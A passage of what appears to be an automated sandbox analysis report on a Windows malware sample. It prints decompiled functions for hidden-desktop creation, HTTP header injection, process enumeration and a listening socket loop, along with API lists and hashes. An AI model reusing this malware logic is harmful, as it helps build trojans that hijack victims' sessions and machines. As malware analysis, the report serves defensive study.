    0x0041cefa
    0x0041ceff
    0x0041cf05
    0x0041d10f
    0x0041d11c
    0x0041d122
    0x0041d12f
    0x0041cf0b
    0x0041cf0c
    0x00000000
    0x0041cf0c
    0x0041cf05

    APIs
      • Part of subcall function 00409ECD: socket.WS2_32(?,00000001,00000006), ref: 00409ED6
      • Part of subcall function 00409ECD: connect.WS2_32(00000000,?,-0000001D), ref: 00409EF6
      • Part of subcall function 00409ECD: closesocket.WS2_32(00000000), ref: 00409F01
      • Part of subcall function 0040A280: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 0040A296
    • GetCurrentThread.KERNEL32 ref: 0041CF8E
    • SetThreadPriority.KERNEL32(00000000), ref: 0041CF95
      • Part of subcall function 0040EF1F: OpenWindowStationW.USER32 ref: 0040EF44
      • Part of subcall function 0040EF1F: CreateWindowStationW.USER32 ref: 0040EF57
      • Part of subcall function 0040EF1F: GetProcessWindowStation.USER32 ref: 0040EF68
      • Part of subcall function 0040EF1F: OpenDesktopW.USER32(?,00000000,00000000,10000000), ref: 0040EFA3
      • Part of subcall function 0040EF1F: CreateDesktopW.USER32 ref: 0040EFB7
      • Part of subcall function 0040EF1F: GetCurrentThreadId.KERNEL32 ref: 0040EFC3
      • Part of subcall function 0040EF1F: GetThreadDesktop.USER32(00000000), ref: 0040EFCA
      • Part of subcall function 0040EF1F: SetThreadDesktop.USER32(00000000,00000000,00000000), ref: 0040EFDC
      • Part of subcall function 0040EF1F: CloseDesktop.USER32(00000000,00000000,00000000), ref: 0040EFEE
      • Part of subcall function 0040EF1F: CloseWindowStation.USER32(?,?), ref: 0040F009
      • Part of subcall function 0040D5CF: TlsAlloc.KERNEL32(004231B8,00000000,0000018C,00000000,00000000), ref: 0040D5E8
    • GetShellWindow.USER32 ref: 0041CFDB
    • SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?,?), ref: 0041D00E
      • Part of subcall function 0040C70A: PathCombineW.SHLWAPI(?,)A,?,00412909,?,?), ref: 0040C729
    • WaitForSingleObject.KERNEL32(00000000,00001388,?,00000000,00000000,?,00000044,?,00000000,00000044,?,?), ref: 0041D070
    • CloseHandle.KERNEL32(?), ref: 0041D080
    • CloseHandle.KERNEL32(?), ref: 0041D086
    • SystemParametersInfoW.USER32 ref: 0041D095
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: DesktopThreadWindow$CloseStation$CreateCurrentHandleOpenPath$AllocCombineFolderInfoObjectParametersPriorityProcessShellSingleSystemWaitclosesocketconnectsetsockoptsocket
    • String ID:
    • API String ID: 1240616959-0
    • Opcode ID: 692a3017eb5ce1e0ae6bfb2206e6afe613af19aa717b6ad6d7113cee2dcdd83d
    • Instruction ID: 9a1f0ba031929b326a70928446fe498a59ca2dbabef75c4ecff5c1fa2ab16b34
    • Opcode Fuzzy Hash: 692a3017eb5ce1e0ae6bfb2206e6afe613af19aa717b6ad6d7113cee2dcdd83d
    • Instruction Fuzzy Hash: D1619071508341AFC720EFA5CC45A9FBBE8AFC5714F00492EF594A72A1C778D849CB6A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041C91F(void* __ecx, void* __eflags, void* _a4, intOrPtr* _a8, intOrPtr* _a12) {
    				intOrPtr _v16;
    				signed char* _v20;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				intOrPtr _v44;
    				intOrPtr _v64;
    				intOrPtr _v68;
    				intOrPtr _v72;
    				char _v76;
    				char _v104;
    				signed int _v116;
    				signed int _v120;
    				signed int _v124;
    				signed int _v125;
    				char _v128;
    				char _v136;
    				intOrPtr _v172;
    				char _v173;
    				signed int _v176;
    				intOrPtr _v180;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed char _t85;
    				signed int _t88;
    				void* _t92;
    				void* _t96;
    				void* _t100;
    				signed int _t107;
    				signed char* _t119;
    				signed int _t120;
    				struct _CRITICAL_SECTION* _t126;
    				char* _t138;
    				char* _t139;
    				char* _t140;
    				signed int _t142;
    				signed int _t148;
    
    				_v120 = _v120 | 0xffffffff;
    				if(E0041C804( &_v76, __ecx, __eflags, _a4,  *_a8,  *_a12) == 0) {
    					L23:
    					E0041BB4F( &_v76);
    					return _v120;
    				}
    				_t85 = E0041B221( &_v76);
    				_v120 = _t85;
    				if((1 & _t85) == 0) {
    					__eflags = _t85 & 0x00000002;
    					if((_t85 & 0x00000002) == 0) {
    						_t126 = 0x424004;
    						L18:
    						__eflags = _v116 & 0x00000004;
    						if((_v116 & 0x00000004) == 0) {
    							goto L23;
    						}
    						 *_a8 = _v40;
    						 *_a12 = _v36;
    						EnterCriticalSection(_t126);
    						_t146 = _a4;
    						_t88 = E0041BE86(_a4);
    						__eflags = _t88 - 0xffffffff;
    						if(_t88 != 0xffffffff) {
    							L21:
    							_t148 = _t88 * 0x24;
    							__eflags = _t148;
    							E00406E85( *((intOrPtr*)(_t148 +  *0x42401c + 8)));
    							 *((intOrPtr*)(_t148 +  *0x42401c + 8)) = _v44;
    							L22:
    							LeaveCriticalSection(_t126);
    							goto L23;
    						}
    						_t88 = E0041BEAC(_t88, _t146);
    						__eflags = _t88 - 0xffffffff;
    						if(_t88 == 0xffffffff) {
    							goto L22;
    						}
    						goto L21;
    					}
    					_v124 = _v124 & 0x00000000;
    					_v125 = 1;
    					__eflags = _v16 - 1;
    					if(_v16 != 1) {
    						L9:
    						_t138 =  &_v104;
    						_t92 = 0x21;
    						E00405ACA(_t92, _t138);
    						HttpAddRequestHeadersA(_a4, _t138, 0xffffffff, 0xa0000000);
    						_t139 =  &_v128;
    						_t96 = 0x22;
    						E00405ACA(_t96, _t139);
    						HttpAddRequestHeadersA(_a4, _t139, 0xffffffff, 0x80000000);
    						_t140 =  &_v136;
    						_t100 = 0x23;
    						E00405ACA(_t100, _t140);
    						HttpAddRequestHeadersA(_a4, _t140, 0xffffffff, 0x80000000);
    						L10:
    						_t126 = 0x424004;
    						EnterCriticalSection(0x424004);
    						__eflags = _v173;
    						if(_v173 == 0) {
    							L14:
    							E0041BBB9(_v64, _v68);
    							__eflags = _v176;
    							if(_v176 != 0) {
    								E00408B12(_v172);
    							}
    							L16:
    							LeaveCriticalSection(_t126);
    							goto L18;
    						}
    						_t150 = _a4;
    						_t107 = E0041BE86(_a4);
    						__eflags = _t107 - 0xffffffff;
    						if(_t107 != 0xffffffff) {
    							L13:
    							_t142 = _t107 * 0x24;
    							E0041BBB9( *((intOrPtr*)( *0x42401c + _t142 + 0x10)),  *((intOrPtr*)( *0x42401c + _t142 + 0xc)));
    							E00406E85( *(_t142 +  *0x42401c + 0x14));
    							 *(_t142 +  *0x42401c + 0x14) =  *(_t142 +  *0x42401c + 0x14) & 0x00000000;
    							 *(_t142 +  *0x42401c + 0x1c) =  *(_t142 +  *0x42401c + 0x1c) & 0x00000000;
    							 *(_t142 +  *0x42401c + 0x18) =  *(_t142 +  *0x42401c + 0x18) | 0xffffffff;
    							 *((intOrPtr*)(_t142 +  *0x42401c + 0xc)) = _v76;
    							 *((intOrPtr*)(_t142 +  *0x42401c + 0x10)) = _v72;
    							 *((intOrPtr*)(_t142 +  *0x42401c + 0x20)) = _v180;
    							goto L16;
    						}
    						_t107 = E0041BEAC(_t107, _t150);
    						__eflags = _t107 - 0xffffffff;
    						if(_t107 == 0xffffffff) {
    							goto L14;
    						}
    						goto L13;
    					}
    					_t119 = _v20;
    					__eflags =  *_t119 & 0x00000003;
    					if(( *_t119 & 0x00000003) == 0) {
    						goto L9;
    					}
    					_t120 = E0041BE14(_t119,  &_v76);
    					_v124 = _t120;
    					__eflags = _t120;
    					if(_t120 != 0) {
    						_v120 = 1;
    					} else {
    						_v125 = _t120;
    					}
    					goto L10;
    				} else {
    					SetLastError(0x2f78);
    					_v120 = _v120 & 0x00000000;
    					goto L23;
    				}
    			}


    0x0041c92b
    0x0041c948
    0x0041cb30
    0x0041cb34
    0x0041cb43
    0x0041cb43
    0x0041c951
    0x0041c959
    0x0041c95f
    0x0041c976
    0x0041c978
    0x0041cacb
    0x0041cad0
    0x0041cad0
    0x0041cad5
    0x00000000
    0x00000000
    0x0041cade
    0x0041cae8
    0x0041caea
    0x0041caf0
    0x0041caf3
    0x0041caf8
    0x0041cafb
    0x0041cb08
    0x0041cb0f
    0x0041cb0f
    0x0041cb16
    0x0041cb25
    0x0041cb29
    0x0041cb2a
    0x00000000
    0x0041cb2a
    0x0041cafe
    0x0041cb03
    0x0041cb06
    0x00000000
    0x00000000
    0x00000000
    0x0041cb06
    0x0041c97e
    0x0041c983
    0x0041c987
    0x0041c98b
    0x0041c9b3
    0x0041c9b5
    0x0041c9b9
    0x0041c9ba
    0x0041c9d2
    0x0041c9d6
    0x0041c9da
    0x0041c9db
    0x0041c9ee
    0x0041c9f2
    0x0041c9f6
    0x0041c9f7
    0x0041ca05
    0x0041ca07
    0x0041ca07
    0x0041ca0d
    0x0041ca13
    0x0041ca18
    0x0041caa2
    0x0041caad
    0x0041cab2
    0x0041cab7
    0x0041cabd
    0x0041cabd
    0x0041cac2
    0x0041cac3
    0x00000000
    0x0041cac3
    0x0041ca1e
    0x0041ca21
    0x0041ca26
    0x0041ca29
    0x0041ca36
    0x0041ca3d
    0x0041ca48
    0x0041ca56
    0x0041ca60
    0x0041ca6a
    0x0041ca74
    0x0041ca82
    0x0041ca8f
    0x0041ca9c
    0x00000000
    0x0041ca9c
    0x0041ca2c
    0x0041ca31
    0x0041ca34
    0x00000000
    0x00000000
    0x00000000
    0x0041ca34
    0x0041c98d
    0x0041c991
    0x0041c994
    0x00000000
    0x00000000
    0x0041c99a
    0x0041c99f
    0x0041c9a3
    0x0041c9a5
    0x0041c9ad
    0x0041c9a7
    0x0041c9a7
    0x0041c9a7
    0x00000000
    0x0041c961
    0x0041c966
    0x0041c96c
    0x00000000
    0x0041c96c

    APIs
      • Part of subcall function 0041B221: EnterCriticalSection.KERNEL32(00423FE0,-00423E5C,00000000,00423E40), ref: 0041B23C
      • Part of subcall function 0041B221: LeaveCriticalSection.KERNEL32(00423FE0), ref: 0041B2BF
    • SetLastError.KERNEL32(00002F78,?), ref: 0041C966
    • EnterCriticalSection.KERNEL32(00424004), ref: 0041CA0D
    • LeaveCriticalSection.KERNEL32(00424004,?), ref: 0041CAC3
    • EnterCriticalSection.KERNEL32(00424004,?), ref: 0041CAEA
    • LeaveCriticalSection.KERNEL32(00424004,?), ref: 0041CB2A
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CriticalSection$EnterLeave$ErrorLast
    • String ID:
    • API String ID: 486337731-0
    • Opcode ID: a346f28ea6ee941a8a98353e704cdd0750cf4b3ec809ef0d69a36aca0cd0af30
    • Instruction ID: e1a25540b1431eee08dc08b3dc18da052c28e0a1db9459969d57a469f85a459d
    • Opcode Fuzzy Hash: a346f28ea6ee941a8a98353e704cdd0750cf4b3ec809ef0d69a36aca0cd0af30
    • Instruction Fuzzy Hash: 2B519130208344DFC721DF29DC85AAA7BA4FF84368F14462AF954972B1C734EC91DB99
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 82%
    			E004141C3(void* __ecx, void* __eflags) {
    				intOrPtr _v74;
    				signed int _v78;
    				char _v124;
    				char _v128;
    				long _v140;
    				void* _v144;
    				intOrPtr _v148;
    				void* _v152;
    				void* _v156;
    				void* _v160;
    				char _v164;
    				void* _v168;
    				signed int _v172;
    				long _v184;
    				void* __esi;
    				void* _t47;
    				long _t48;
    				void* _t49;
    				long _t56;
    				long _t57;
    				long _t59;
    				intOrPtr _t64;
    				long _t65;
    				long _t69;
    				void* _t72;
    				long _t77;
    				signed int _t83;
    				intOrPtr* _t85;
    				signed int _t94;
    				long _t97;
    				signed int _t98;
    				void* _t100;
    
    				_t100 = (_t98 & 0xfffffff8) - 0xac;
    				_t83 = 2;
    				_t47 = E00412EC8(__ecx, __eflags, 0x743c152e, _t83);
    				_v156 = _t47;
    				if(_t47 != 0) {
    					_t48 = E00412FEE();
    					__eflags = _t48;
    					if(_t48 == 0) {
    						L26:
    						E0040A658(_v148);
    						_t49 = 0;
    						__eflags = 0;
    						L27:
    						return _t49;
    					}
    					E004124FF(__ecx,  &_v124);
    					_t87 = _v78;
    					_t94 = E0041406E( &_v160, _v78,  &_v168) & 0x0000ffff;
    					__eflags = _t94;
    					if(_t94 != 0) {
    						L7:
    						__eflags = _t94 - _v74;
    						if(_t94 != _v74) {
    							E004125BA( &_v124);
    							_v78 = _t94;
    							E00412612( &_v128);
    						}
    						_v144 =  *0x423e2c;
    						_t56 = _v152;
    						_v172 = 1;
    						__eflags = _t56;
    						if(_t56 != 0) {
    							_v140 = _t56;
    							_v172 = _t83;
    						}
    						_t57 = _v160;
    						__eflags = _t57;
    						if(_t57 != 0) {
    							_t87 = _v172;
    							_t20 =  &_v172;
    							 *_t20 = _v172 + 1;
    							__eflags =  *_t20;
    							 *(_t100 + 0x2c + _v172 * 4) = _t57;
    						}
    						_t59 = WaitForMultipleObjects(_v172,  &_v144, 0, 0xffffffff);
    						__eflags = _t59;
    						if(_t59 <= 0) {
    							L25:
    							E0040A228(_t59, _v156);
    							E0040A228(CloseHandle(_v152), _v164);
    							CloseHandle(_v160);
    							goto L26;
    						} else {
    							_t85 = __imp__#1;
    							while(1) {
    								__eflags = _t59 - _v172;
    								if(_t59 >= _v172) {
    									goto L25;
    								}
    								_t64 =  *((intOrPtr*)(_t100 + 0x2c + _t59 * 4));
    								__eflags = _t64 - _v152;
    								if(_t64 != _v152) {
    									__eflags = _t64 - _v160;
    									if(_t64 != _v160) {
    										while(1) {
    											L23:
    											_t65 =  *_t85(_v168, 0, 0);
    											_t97 = _t65;
    											__eflags = _t97 - 0xffffffff;
    											if(_t97 == 0xffffffff) {
    												break;
    											}
    											__imp__WSAEventSelect(_t97, 0, 0);
    											_v156 = 0;
    											__imp__WSAIoctl(_t97, 0x8004667e,  &_v156, 4, 0, 0,  &_v152, 0, 0);
    											E0040A280(_t87, _t97);
    											_t69 = E004088BA(0x20000, E004140F6, _t97);
    											__eflags = _t69;
    											if(_t69 == 0) {
    												E0040A228(_t69, _t97);
    											}
    										}
    										_t59 = WaitForMultipleObjects(_v184,  &_v156, 0, _t65);
    										__eflags = _t59;
    										if(_t59 > 0) {
    											continue;
    										}
    										goto L25;
    									}
    									_t72 = _v164;
    									L20:
    									_v168 = _t72;
    									goto L23;
    								}
    								_t72 = _v156;
    								goto L20;
    							}
    							goto L25;
    						}
    					} else {
    						goto L4;
    					}
    					while(1) {
    						L4:
    						_t77 = WaitForSingleObject( *0x423e2c, 0x3e8);
    						__eflags = _t77 - 0x102;
    						if(_t77 != 0x102) {
    							break;
    						}
    						_t87 = _v74;
    						_t94 = E0041406E( &_v156, _v74,  &_v164) & 0x0000ffff;
    						__eflags = _t94;
    						if(_t94 == 0) {
    							continue;
    						}
    						break;
    					}
    					__eflags = _t94;
    					if(_t94 == 0) {
    						goto L26;
    					}
    					goto L7;
    				}
    				_t49 = 1;
    				goto L27;
    			}


    APIs
      • Part of subcall function 00412EC8: CreateMutexW.KERNEL32(004239A0,00000000,?,?,?,?,?), ref: 00412EE9
    • WaitForSingleObject.KERNEL32(000003E8,?,?,743C152E,00000002), ref: 0041422E
    • WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF,?,?,743C152E), ref: 004142BF
    • accept.WS2_32(?,00000000,00000000), ref: 0041434B
    • WaitForMultipleObjects.KERNEL32(?,?,00000000,00000000), ref: 0041435F
    • CloseHandle.KERNEL32(?), ref: 00414380
    • CloseHandle.KERNEL32(?), ref: 0041438F
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Wait$CloseHandleMultipleObjects$CreateMutexObjectSingleaccept
    • String ID:
    • API String ID: 38240579-0
    • Opcode ID: 28ddd3194b4cc48f97d93dd0e2f6fc0781d01b251f61b6a1a6abeade50b7805c
    • Instruction ID: 0ee328ee0d924732d6edb2fbba1cd09f98464ba88ea2f2edfb3d4f156d3bbdd1
    • Opcode Fuzzy Hash: 28ddd3194b4cc48f97d93dd0e2f6fc0781d01b251f61b6a1a6abeade50b7805c
    • Instruction Fuzzy Hash: DD516D31508214ABC720EF65DD44D9FB7E9EBC4754F200A2EF991E32A0D734DD858B6A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00405F8D() {
    				char _v5;
    				signed int _v12;
    				signed int _v16;
    				void* _v20;
    				int _v24;
    				void* _v28;
    				char _v32;
    				long _v588;
    				void* _v596;
    				void* __esi;
    				void* _t42;
    				struct tagPROCESSENTRY32W* _t45;
    				signed int _t47;
    				void* _t48;
    				long _t65;
    				int _t71;
    				void** _t72;
    				void* _t73;
    
    				_t71 = 0;
    				_v5 = 0;
    				_v16 = 0;
    				_v12 = 0;
    				while(1) {
    					_t42 = CreateToolhelp32Snapshot(2, _t71);
    					_v20 = _t42;
    					_v24 = _t71;
    					if(_t42 == 0xffffffff) {
    						break;
    					} else {
    						_t45 =  &_v596;
    						_v596 = 0x22c;
    						Process32FirstW(_v20, _t45);
    					}
    					while(_t45 != 0) {
    						_t65 = _v588;
    						if(_t65 <= _t71 || _t65 ==  *0x423bd8) {
    							L20:
    							_t45 = Process32NextW(_v20,  &_v596);
    							continue;
    						} else {
    							_t47 = 0;
    							if(_v12 <= _t71) {
    								L8:
    								_t48 = E00412E11(_t65, _t70, _t65);
    								_v28 = _t48;
    								if(_t48 != _t71) {
    									_t73 = OpenProcess(0x400, _t71, _v588);
    									if(_t73 != _t71) {
    										_t72 = E0040849C(_t65, _t73,  &_v32);
    										CloseHandle(_t73);
    										if(_t72 != 0) {
    											if(_v32 ==  *0x423978 && GetLengthSid( *_t72) ==  *0x423970 && E00406EF6( *((intOrPtr*)( *0x42396c)),  *_t72, _t56) == 0 && E00406E10(4 + _v12 * 4,  &_v16) != 0) {
    												_t70 = _v12;
    												_v12 = _v12 + 1;
    												_v24 = _v24 + 1;
    												 *((intOrPtr*)(_v16 + _v12 * 4)) = _v588;
    												if(E00405F04(_v16, _v588, _v28) != 0) {
    													_v5 = 1;
    												}
    											}
    											E00406E85(_t72);
    										}
    										_t71 = 0;
    									}
    									CloseHandle(_v28);
    								}
    								goto L20;
    							} else {
    								goto L6;
    							}
    							while(1) {
    								L6:
    								_t70 = _v16;
    								if( *((intOrPtr*)(_v16 + _t47 * 4)) == _t65) {
    									goto L20;
    								}
    								_t47 = _t47 + 1;
    								if(_t47 < _v12) {
    									continue;
    								}
    								goto L8;
    							}
    							goto L20;
    						}
    					}
    					CloseHandle(_v20);
    					if(_v24 != _t71) {
    						continue;
    					}
    					break;
    				}
    				E00406E85(_v16);
    				return _v5;
    			}

    APIs
    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00405FAE
    • Process32FirstW.KERNEL32(000001E6,?), ref: 00405FD7
    • OpenProcess.KERNEL32(00000400,00000000,?,?,?,74B5F560,00000000), ref: 00406032
    • CloseHandle.KERNEL32(00000000,00000000,?,?,74B5F560,00000000), ref: 0040604F
    • GetLengthSid.ADVAPI32(00000000,?,74B5F560,00000000), ref: 00406062
    • CloseHandle.KERNEL32(?,?,74B5F560,00000000), ref: 004060CF
    • Process32NextW.KERNEL32(000001E6,0000022C), ref: 004060DB
    • CloseHandle.KERNEL32(000001E6,?,74B5F560,00000000), ref: 004060EC
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CloseHandle$Process32$CreateFirstLengthNextOpenProcessSnapshotToolhelp32
    • String ID:
    • API String ID: 1981844004-0
    • Opcode ID: 102aa5b3a5572a0c8206b2ad813836ddf9597e410a2eccb9fd90e54b22069b60
    • Instruction ID: 8b88a68ca66be50f030537a4abaf3047a9b79fb0861a7979160b4664bf09d63a
    • Opcode Fuzzy Hash: 102aa5b3a5572a0c8206b2ad813836ddf9597e410a2eccb9fd90e54b22069b60
    • Instruction Fuzzy Hash: 16417E70900219AFCF21DFA4CC849AEBBB5FF45304F1101BAE516B32A0DB3959A5CB58
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040FA5F(int __eax, long __ecx, void* __edx) {
    				struct HWND__* _v8;
    				signed short _v12;
    				int _v16;
    				long _v20;
    				struct tagPOINT _v28;
    				intOrPtr _t46;
    				int _t50;
    				signed int _t51;
    				signed int _t52;
    				signed int _t63;
    				signed int _t64;
    				signed int _t67;
    				signed int _t69;
    				signed int _t70;
    				signed int _t71;
    				int _t73;
    				void* _t74;
    				long _t78;
    				void* _t79;
    				void* _t80;
    				intOrPtr _t81;
    
    				_t80 = __edx;
    				_t73 = __eax;
    				_t78 = __ecx;
    				WaitForSingleObject( *(__edx + 0x14), 0xffffffff);
    				_t46 =  *((intOrPtr*)(_t80 + 0x10));
    				_v8 =  *((intOrPtr*)(_t46 + 0x108));
    				_v12 =  *(_t46 + 0x110) & 0x0000ffff;
    				ReleaseMutex( *(_t80 + 0x14));
    				_t50 = GetWindowRect(_v8,  &_v28);
    				if(_t50 != 0) {
    					if(_v12 != 2) {
    						_t51 = _v12 & 0x0000ffff;
    						__eflags = _t51 - 0xd;
    						if(__eflags > 0) {
    							_t52 = _t51 - 0xe;
    							__eflags = _t52;
    							if(_t52 == 0) {
    								_v20 = _t78;
    								goto L22;
    							} else {
    								_t63 = _t52 - 1;
    								__eflags = _t63;
    								if(_t63 == 0) {
    									_v16 = _t73;
    								} else {
    									_t64 = _t63 - 1;
    									__eflags = _t64;
    									if(_t64 == 0) {
    										_v16 = _t73;
    										goto L19;
    									} else {
    										__eflags = _t64 == 1;
    										if(_t64 == 1) {
    											goto L16;
    										}
    									}
    								}
    							}
    						} else {
    							if(__eflags == 0) {
    								L11:
    								_v28.x = _t78;
    								goto L22;
    							} else {
    								_t67 = _t51;
    								__eflags = _t67;
    								if(_t67 == 0) {
    									goto L11;
    								} else {
    									_t69 = _t67;
    									__eflags = _t69;
    									if(_t69 == 0) {
    										L16:
    										_v16 = _t73;
    										goto L17;
    									} else {
    										_t70 = _t69 - 6;
    										__eflags = _t70;
    										if(_t70 == 0) {
    											L19:
    											_v28.x = _t78;
    										} else {
    											_t71 = _t70 - 1;
    											__eflags = _t71;
    											if(_t71 == 0) {
    												L17:
    												_v20 = _t78;
    											} else {
    												__eflags = _t71 == 1;
    												if(_t71 == 1) {
    													L22:
    													_v28.y = _t73;
    												}
    											}
    										}
    									}
    								}
    							}
    						}
    					} else {
    						_t81 =  *((intOrPtr*)(_t80 + 0x10));
    						_t79 = _t78 -  *((intOrPtr*)(_t81 + 0x100));
    						_t74 = _t73 -  *((intOrPtr*)(_t81 + 0x104));
    						_v28.x = _v28.x + _t79;
    						_v28.y = _v28.y + _t74;
    						_v20 = _v20 + _t79;
    						_v16 = _v16 + _t74;
    					}
    					_t50 = IsRectEmpty( &_v28);
    					if(_t50 == 0) {
    						if((GetWindowLongW(_v8, 0xfffffff0) & 0x40000000) != 0) {
    							MapWindowPoints(0, GetParent(_v8),  &_v28, 2);
    						}
    						return SetWindowPos(_v8, 0, _v28.x, _v28.y, _v20 - _v28, _v16 - _v28.y, 0x630c);
    					}
    				}
    				return _t50;
    			}


    APIs
    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040FA73
    • ReleaseMutex.KERNEL32(?), ref: 0040FA92
    • GetWindowRect.USER32 ref: 0040FA9F
    • IsRectEmpty.USER32(?), ref: 0040FB23
    • GetWindowLongW.USER32(?,000000F0), ref: 0040FB32
    • GetParent.USER32(?), ref: 0040FB48
    • MapWindowPoints.USER32 ref: 0040FB51
    • SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C), ref: 0040FB75
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Window$Rect$EmptyLongMutexObjectParentPointsReleaseSingleWait
    • String ID:
    • API String ID: 2634726239-0
    • Opcode ID: 13b73a19ed11d4e8d08ecee732d92f6a49c880a7ec2914ba8645d3ce162c6c4d
    • Instruction ID: ff04ae67f8ebd9934e37cb14dbfdc182a8f09f2aa488094080bef6470f29fa1b
    • Opcode Fuzzy Hash: 13b73a19ed11d4e8d08ecee732d92f6a49c880a7ec2914ba8645d3ce162c6c4d
    • Instruction Fuzzy Hash: F641507190020ADFDB309FD8D9599BEBBB4FB44350F50017AE601F2AA4D774A944DF54
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 90%
    			E0041B221(intOrPtr _a4) {
    				char _v9;
    				signed int _v16;
    				signed int _v20;
    				signed int _v24;
    				signed int _v32;
    				char _v36;
    				char _v60;
    				char _v72;
    				signed int _v76;
    				char* _v80;
    				void* _v96;
    				intOrPtr _v148;
    				void* _v160;
    				char _v168;
    				char _v272;
    				char _v536;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				intOrPtr _t128;
    				intOrPtr* _t129;
    				char* _t130;
    				void* _t137;
    				void* _t140;
    				void* _t144;
    				void* _t152;
    				void* _t154;
    				char* _t156;
    				void* _t161;
    				void* _t163;
    				void* _t164;
    				void* _t167;
    				void* _t172;
    				intOrPtr _t174;
    				intOrPtr* _t176;
    				void* _t177;
    				void* _t182;
    				intOrPtr _t186;
    				intOrPtr _t187;
    				signed int _t189;
    				void* _t194;
    				void* _t197;
    				void* _t198;
    				void* _t199;
    				int _t204;
    				void* _t207;
    				signed int _t210;
    				void* _t214;
    				signed int _t217;
    				signed int _t218;
    				void* _t219;
    				void* _t224;
    				char* _t227;
    				intOrPtr _t228;
    				char* _t233;
    				char* _t236;
    				intOrPtr _t238;
    				signed int _t239;
    				intOrPtr _t240;
    				void* _t244;
    				void* _t247;
    
    				_t217 = 0;
    				_v16 = 0;
    				_v9 = 0xff;
    				EnterCriticalSection(0x423fe0);
    				_t225 =  *0x423ffc;
    				if( *0x423ffc == 0 ||  *0x423ff8 == 0) {
    					_t240 = _a4;
    				} else {
    					_t240 = _a4;
    					_t230 = 0;
    					if(E0041A956(_t225, 0,  *(_t240 + 8),  *(_t240 + 0xc)) != 0) {
    						_t210 = E004167D0();
    						_v20 = _t210;
    						if(_t210 != 0) {
    							_t214 = E0041AA10(0, 4,  &_v20,  *0x423ff8);
    							_push(_v20);
    							if(_t214 == 0) {
    								E00406E85();
    							}
    							E0041683B(_t225);
    						}
    						E00406E85( *0x423ff8);
    						E00406E85( *0x423ffc);
    						 *0x423ff8 = _t217;
    						 *0x423ffc = _t217;
    					}
    				}
    				LeaveCriticalSection(0x423fe0);
    				_t128 =  *((intOrPtr*)(_t240 + 0x40));
    				_t254 = _t128 - _t217;
    				if(_t128 == _t217) {
    					L38:
    					if((_v16 & 0x00000001) == 0) {
    						_t187 =  *((intOrPtr*)(_t240 + 0x44));
    						_t272 = _t187 - _t217;
    						if(_t187 != _t217 && E0041AC11(_t225, _t230, _t272, 3, _t187,  *(_t240 + 8),  *(_t240 + 0xc), _t217) != 0) {
    							_v16 = _v16 | 0x00000001;
    						}
    					}
    					if( *(_t240 + 0x20) >= 0x21) {
    						_t182 = 0x10;
    						E00405ACA(_t182,  &_v72);
    						_t238 =  *((intOrPtr*)(_t240 + 0x1c));
    						if(E00406EF6( &_v72, _t238, 0x21) == 0) {
    							_t186 =  *((intOrPtr*)(_t238 + 0x21));
    							if(_t186 == 0x3b || _t186 == 0) {
    								_v16 = _v16 | 0x00000010;
    							}
    						}
    					}
    					_t129 =  *((intOrPtr*)(_t240 + 0x2c));
    					_v24 = _t217;
    					if(_t129 == _t217 ||  *_t129 == _t217) {
    						L52:
    						_t130 =  *((intOrPtr*)(_t240 + 0x34));
    						__eflags = _t130 - _t217;
    						if(_t130 == _t217) {
    							goto L60;
    						}
    						__eflags =  *_t130;
    						if( *_t130 == 0) {
    							goto L60;
    						}
    						_t167 = 0x12;
    						E00405B00(_t167,  &_v168);
    						_t172 = E00407BF3( &_v24,  &_v168,  *((intOrPtr*)(_a4 + 0x34)));
    						_t247 = _t247 + 0xc;
    						goto L55;
    					} else {
    						_t176 =  *((intOrPtr*)(_t240 + 0x30));
    						if(_t176 == _t217 ||  *_t176 == _t217) {
    							goto L52;
    						} else {
    							_t177 = 0x11;
    							E00405B00(_t177,  &_v272);
    							_push( *((intOrPtr*)(_a4 + 0x30)));
